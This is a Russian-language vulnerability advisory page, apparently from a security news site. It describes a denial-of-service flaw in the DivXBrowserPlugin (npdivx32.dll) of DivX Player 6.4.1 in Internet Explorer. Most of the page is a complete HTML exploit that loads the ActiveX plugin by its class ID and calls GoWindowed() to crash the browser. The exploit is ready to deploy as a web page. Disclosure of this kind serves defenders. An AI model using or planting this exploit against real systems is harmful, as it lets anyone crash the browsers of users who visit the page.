Программа: Microsoft Internet Explorer DivX Player 6.4.1

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в DivXBrowserPlugin в npdivx32.dll при обработке входных данных. Эксплуатирование уязвимости приведет систему к отказу в обслуживании.

Эксплоит:

<!-------------------------------------------------------------
DivX Player 6.4.1 (DivXBrowserPlugin npdivx32.dll) Internet Explorer Denial
of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

This plugin is installed with DivX Player. This is the one you can find with
the last version of the software DivX Player 6.4.1
url: http://www.divx.com/
--------------------------------------------------------------->
<html>
<OBJECT id=DivXBrowserPlugin style="LEFT: 0px; WIDTH: 1px; TOP: 0px; HEIGHT:
1px" height=1 width=1
       classid=clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616>
       <PARAM NAME="_cx" VALUE="26">
       <PARAM NAME="_cy" VALUE="26"></OBJECT>
<script>
DivXBrowserPlugin.GoWindowed()
</script>
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии